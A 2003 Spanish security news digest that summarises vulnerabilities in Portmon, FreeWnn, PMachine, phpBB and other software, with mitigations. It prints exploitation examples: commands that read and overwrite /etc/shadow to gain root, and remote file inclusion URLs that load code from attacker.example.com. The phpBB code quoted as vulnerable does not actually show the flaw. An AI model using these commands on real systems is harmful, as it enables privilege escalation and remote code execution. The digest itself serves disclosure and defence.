Nueva vulnerabilidad en el ProFTPD, cuando se usa ‘mod_sql’ un atacante remoto puede acceder como un usuario pero sin identificarse.
Las versiones vulnerables son: 1.2.9rc1 y versiones anteriores
La solución para este problema ya ha salido, el parche arregla el siguiente archivo ‘contrib/mod_sql_postgres.c’ Usted lo puede conseguir via cvs en http://www.proftpd.org/cvs.html
Se ha encontrado una vulnerabilidad local en el Portmon en la version 1.7 y quizas en versiones anteriores. Esta vulnerabilidad permite obtener archivos con permisos de root y escribir archivos con permisos de root.
Ejemplo de como leer archivos:
[lucae@linux lucae]$portmon -c /etc/shadow
Unable to resolve hostname
root:$1$nsqR6sX$ItXXXXXXXXXXXXXXXXX.:12172:0:99999:7:::
Unable to resolve hostname bin:*:12172:0:99999:7:::
Unable to resolve hostname daemon:*:12172:0:99999:7:::
Unable to resolve hostname adm:*:12172:0:99999:7:::
Unable to resolve hostname lp:*:12172:0:99999:7:::
Unable to resolve hostname sync:*:12172:0:99999:7:::
Unable to resolve hostname shutdown:*:12172:0:99999:7:::
Unable to resolve hostname halt:*:12172:0:99999:7:::
Unable to resolve hostname mail:*:12172:0:99999:7:::
Unable to resolve hostname news:*:12172:0:99999:7:::
Ejemplo de como escribir archivos:
[lucae@linux lucae]$portmon -l /etc/shadow
fopen: No such file or directory
Failed reading config file hosts
[root@linux root]#cat /etc/shadow
lucae:$1$w3IGpzV4$i8WcXXXXXXXXXXXXXXXX/:12172:0:99999:7:::
nessus:$1$XSaW3b5e$WWzXXXXXXXXXXXXXXXX.:12183:0:99999:7:::
test:$1$6r5/OoES$RX3OXXXXXXXXXXXXXXXX/:12200:0:99999:7:::
(Mon Jun 16 01:40:17 2003) - Portmon started by user
lucae //line added
[root@linux root]#
La solución para este problema es:
chmod -s portmon
si quiere ver si salieron versiones nuevas o parches puede
consultar a esta dirección:
Se ha encontrado una vulnerabilidad en el phpBB, la vulnerabilidad se encuentra en viewtopic.php.
La vulnerabilidad permite al atacante conseguir los hash password directamente del sql server.
Esta es la parte vulnerable en el codigo de viewtopic.php
if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
{
$topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
else if ( isset($HTTP_GET_VARS[’topic’]) )
{
$topic_id = intval($HTTP_GET_VARS[’topic’]);
}
Este vulnerabilidad fue probada con mysql 4 y pgsql.
Todavia no ha salido ningun parche o ninguna version nueva que arregle esta vulnerabilidad, igual puede consultar:
Se hace encontrado una nueva vulnerabilidad en el Nethack en las siguientes versiones:
1.1.5
1.1.3
3.3.0
3.4.0
Esta vulnerabilidad no es muy importante por que no tiene SUID, un atacante solo podria conseguir setgid de games.
Recomendación: Si en su maquina tiene el Nethack con SUID le recomendamos que haga lo siguiente:
chmod -s /usr/games/lib/nethackdir/nethack
“En febrero pasado, Microsoft constató que algunas notificaciones automáticas de Internet Explorer podían dar a intrusos acceso directo al PC. El error aún no es corregido.
Internet Explorer contiene diversos archivos internos para recursos basados en HTML. La mayoría tiene por función informar sobre errores HTTP en sitios web. En inglés, tales errores son denominados “Friendly http error messages”. Tales archivos se basan, en gran medida, en el mismo código, aunque presentan leves variaciones de contenido dependiendo del recurso en cuestión.
La compañía GreyMagic Software detectó en febrero pasado un error de validación en dichos mensajes de error. Según la compañía, el problema radica en que el código en que están creadas las páginas toma como parámetro la URL original con el fin de mostrar el nombre completo del servidor en el mensaje de error. La compañía asegura que tal procedimiento puede ser explotado por intrusos mediante la inclusión de un script que es ejecutado en la zona de seguridad del PC.
GreyMagic dice haber informado a Microsoft sobre la vulnerabilidad el pasado 20 de febrero, y que la compañía confirmó que el error afectaba a Internet Explorer 6 y a las versiones anteriores del navegador. Sin embargo, el problema de seguridad aún no ha sido corregido, escribe GreyMagic, agregando que Microsoft le habría indicado que lo hará en una futura actualización de seguridad de Internet Explorer.
La compañía de seguridad informática Secunia sugiere a sus usuarios, como solución provisoria, desactivar la función de Active Scripting en la zona local de seguridad.”
Esta curiosa noticia ha sido extraida de http://www.diarioti.com/gate/n.php?id=3515
Durante estos días se están desarrollando charlas sobre seguridad informática en la red de irc irc.uninet.edu, en el canal #infosec. Las charlas que son en inglés, con traducidas simultaneamente al español en otros canales. También se pueden revisar los logs de anteriores charlas.
El período de impartición de estas charlas es desde el 16 al 20 de Junio.
IRC: irc.uninet.edu
Logs de anteriores charlas: http://infosec.uninet.edu/infosec2003/des.html
Página principal: http://infosec.uninet.edu/
La consola de Nintendo tiene un fallo en Phantasy Star Online (PSO). Esta es una utilidad de la GameCube que permite enviar ficheros a la consola para luego iniciar GameCube con dichos ficheros.
Ya han aparecido diversas utilidades que se aprovechan de este fallo, y se han conseguido cargar ejecutables no oficiales de Nintendo. Ya están empezando a desarrollarse aplicaciones multimedia y otro tipo de software similar para esta consola.
Más información: http://www.gcdev.com/
Se ha encontrado una vulnerabilidad en el FreeWmm 1.1.1 en la version del mandrake 9.1. Esta vulnerabilidad permite a un atacante elevar sus privilegios en la maquina vulnerable.
ejemplo:
$>/usr/bin/Wnn4/jserver -s /etc/shadow
$>/usr/bin/Wnn4/wddel -D localhost -n ‘
> root::12146:0:99999:7:::
> bin:*:12146:0:99999:7:::
> daemon:*:12146:0:99999:7:::
> adm:*:12146:0:99999:7:::
> lp:*:12146:0:99999:7:::
> sync:*:12146:0:99999:7:::
> shutdown:*:12146:0:99999:7:::
> halt:*:12146:0:99999:7:::
> ‘ -d 123
$>su -
La solución mas rapida para esta vulnerabilidad es la siguiente:
chmod -s /usr/bin/Wnn4/jserver
chmod -s /usr/bin/Wnn4/wddel
Se ha encontrado una vulnerabilidad en PMachine Lib.Inc.PHP la version vulnerable es PMachine PMachine 2.2.1.
Esta vulnerabilidad permite la ejecución de comandos remotamente.
Ejemplos de esta vulnerabilidad:
http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt con:
http://attacker.example.com/config.txt
o
http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt con:
http://attacker.example.com/config/badcode.txt
Todavia no hay ninguna solución para esta vulnerabilidad, pero usted puede consultar la siguiente pagina del software para esperar nuevas versiones que solucionen esta vulnerabilidad:
Se ha encontrado una vulnerabilidad en LedNews (CGI/Perl) en la version v0.7 la cual permite Cross scripting
ejemplo:
La pagina de este cgi es:
Shell Security (también conocido como 'Shellsec') es un portal de actualidad especializado en seguridad informática y temática de índole tecnológica en la que todos los usuarios pueden participar activamente a través de comentarios o mediante nuestro foro
 |
 |
Shell Security está dirigido y gestionado por Inforalia, SL
